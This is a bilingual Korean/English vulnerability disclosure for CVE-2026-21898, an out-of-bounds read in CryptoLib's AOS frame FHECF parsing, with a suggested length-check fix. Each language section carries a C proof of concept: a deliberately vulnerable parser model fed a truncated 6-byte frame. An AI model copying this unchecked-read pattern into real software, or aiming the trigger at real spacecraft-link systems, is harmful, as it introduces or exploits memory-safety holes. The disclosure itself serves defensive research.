Finder
CVE-2026-21898 본문
KR
CryptoLib
CryptoLib은 NASA의 cFS(core Flight System)가 구동되는 위성체와 지상국 간의 통신을 보호하기 위해 하드웨어 보안 모듈(HSM) 없이 소프트웨어만으로 CCSDS SDLS-EP(Extended Procedures)를 구현한 오픈소스 프로젝트입니다.
취약점 설명
crypto_aos.c에서 FHECF를 파싱할 때, 길이 검사는 프레임 최소 길이인 aos_hdr_len(6바이트)만 확인하고, aos_has_fhec == AOS_HAS_FHEC이면 곧바로 p_ingest[6], p_ingest[7]을 읽고 Crypto_Calc_FHECF(p_ingest)를 호출합니다.
따라서 길이가 6~7바이트로 잘린 AOS 프레임을 넣으면 OOB Read가 트리거됩니다.
이후 len_ingest < max_frame_size 체크가 있지만, 이 검증은 OOB Read가 이미 발생한 뒤에 수행됩니다. 따라서 FHECF 2바이트를 읽기 전에 len_ingest가 aos_hdr_len + 2 이상인지 먼저 확인해야 합니다.
poc
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Stands in for the aos_has_fhec == AOS_HAS_FHEC condition from the write-up;
 * fixed at 1 so the FHECF branch in process_frame is enabled. */
static const int aos_has_fhec = 1;
/*
 * Minimal stand-in for the FHECF parsing step described in the write-up.
 *
 * Returns -1 when len_ingest is smaller than the 6-byte AOS header. Otherwise,
 * when aos_has_fhec is non-zero, the two bytes directly after the header
 * (p_ingest[6] and p_ingest[7]) are combined big-endian into a 16-bit value,
 * printed, and 0 is returned.
 *
 * Deliberately vulnerable: the only length check covers the header, so a
 * 6- or 7-byte buffer is read past its end. A corrected parser would require
 * len_ingest >= header_len + 2 before touching the FHECF bytes.
 */
int process_frame(uint8_t *p_ingest, size_t len_ingest)
{
    const size_t header_len = 6;

    /* Header-only length check: says nothing about the FHECF that follows. */
    if (len_ingest < header_len) {
        fprintf(stderr, "Frame too short for header\n");
        return -1;
    }

    if (!aos_has_fhec) {
        return 0;
    }

    /* No bound on len_ingest here: indices 6 and 7 may lie outside the buffer. */
    const uint8_t fhecf_hi = p_ingest[header_len];
    const uint8_t fhecf_lo = p_ingest[header_len + 1];
    const uint16_t received_fhecf =
        (uint16_t)(((uint16_t)fhecf_hi << 8) | (uint16_t)fhecf_lo);

    printf("Parsed FHECF (OOB read) = 0x%04x\n", received_fhecf);
    return 0;
}
/*
 * Driver for the demonstration: hands process_frame a buffer that is exactly
 * as long as the 6-byte header, so the parser's reads at indices 6 and 7 fall
 * outside the array. Without instrumentation the read typically goes
 * unnoticed; building with -fsanitize=address makes it visible.
 */
int main(void)
{
    uint8_t short_frame[6];
    int status;

    /* Recognisable fill pattern for the in-bounds bytes. */
    memset(short_frame, 0xAA, sizeof short_frame);

    printf("Feeding %zu-byte frame to vulnerable parser...\n", sizeof short_frame);
    status = process_frame(short_frame, sizeof short_frame);
    printf("Return code: %d\n", status);

    return status;
}
EN
CryptoLib
CryptoLib is an open-source project that implements CCSDS SDLS-EP (Extended Procedures) purely in software, without relying on a hardware security module (HSM), to protect communications between spacecraft running NASA’s cFS (core Flight System) and ground stations.
Vulnerability Description
In crypto_aos.c, when parsing the FHECF, the length check only verifies the minimum AOS frame length (aos_hdr_len, 6 bytes).
If aos_has_fhec == AOS_HAS_FHEC, the code immediately reads p_ingest[6] and p_ingest[7] and calls Crypto_Calc_FHECF(p_ingest).
As a result, providing a truncated AOS frame with a length of 6–7 bytes triggers an out-of-bounds read.
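Although there is a subsequent check of len_ingest < max_frame_size, the out-of-bounds read occurs before this validation. The parser therefore needs to confirm that len_ingest is at least aos_hdr_len + 2 before it reads the two FHECF bytes.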
poc
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Models the aos_has_fhec == AOS_HAS_FHEC case from the description above;
 * set to 1 so process_frame's FHECF branch is active. */
static const int aos_has_fhec = 1;
/*
 * Reduced model of the FHECF parse path from the description above.
 *
 * A frame shorter than the 6-byte AOS header is rejected with -1. For any
 * other length, if aos_has_fhec is set, the 16-bit big-endian value stored
 * immediately after the header is read from p_ingest[6..7], printed, and the
 * function returns 0.
 *
 * This is the vulnerable shape on purpose: len_ingest is compared against the
 * header length only, so frames of 6 or 7 bytes cause an out-of-bounds read.
 * The missing guard is a check that len_ingest is at least hdr_bytes + 2
 * before the FHECF is accessed.
 */
int process_frame(uint8_t *p_ingest, size_t len_ingest)
{
    const size_t hdr_bytes = 6;

    /* Only the header is accounted for in this check. */
    if (len_ingest < hdr_bytes) {
        fprintf(stderr, "Frame too short for header\n");
        return -1;
    }

    if (aos_has_fhec) {
        /* Forming the pointer is fine; dereferencing it is unchecked. */
        const uint8_t *fhecf_field = p_ingest + hdr_bytes;
        uint16_t received_fhecf = (uint16_t)((uint16_t)fhecf_field[0] << 8);

        received_fhecf = (uint16_t)(received_fhecf | (uint16_t)fhecf_field[1]);
        printf("Parsed FHECF (OOB read) = 0x%04x\n", received_fhecf);
    }

    return 0;
}
/*
 * Entry point of the demonstration. The buffer passed to process_frame holds
 * exactly 6 bytes, matching the header length the parser checks for, so the
 * FHECF bytes it reads next are not part of the array. Compile with
 * -fsanitize=address to have the out-of-bounds read reported at run time.
 */
int main(void)
{
    uint8_t truncated[6];

    /* 0xAA marks the bytes that legitimately belong to the frame. */
    memset(truncated, 0xAA, sizeof truncated);
    printf("Feeding %zu-byte frame to vulnerable parser...\n", sizeof truncated);

    const int result = process_frame(truncated, sizeof truncated);

    printf("Return code: %d\n", result);
    return result;
}